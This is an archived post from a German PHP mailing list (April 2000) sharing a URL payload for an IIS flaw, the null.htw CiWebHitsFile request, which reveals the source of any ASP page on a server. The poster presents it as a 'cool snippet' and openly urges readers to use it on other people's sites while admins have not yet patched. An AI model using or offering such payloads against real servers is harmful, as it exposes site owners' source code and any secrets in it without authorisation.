phpbar.de - Mailinglisten-Archive

Mailinglisten-Archive

[php] HAHA: View any ASP source

jm.Fuchs jm.Fuchs_(at)_whx.de
Sun, 2 Apr 2000 20:27:08 +0200

Previous message: [php] Formulardaten und Sessions in php4
Next message: [php] Zeile in Datei suchen
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

View any ASP source :)

This is a cool snippet I picked up from 4 Guys From Rolla (a great ASP
site). A security flaw has been detected which
enables anyone to view any ASP source sitting on an IIS server. Simply use
this URL:
http://www.yoursite.com/null.htw?CiWebHitsFile=/yourfile.asp%20&CiRestrictio
n=none&CiHiliteType=Full
and Bob's your uncle. M$ released a patch last Friday, but, as it's the
weekend, not many admins have seen it. So, in the meantime, we can see how
all our favourite ASP sites work :) (Read more)

Previous message: [php] Formulardaten und Sessions in php4
Next message: [php] Zeile in Datei suchen
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

php::bar PHP Wiki - Listenarchive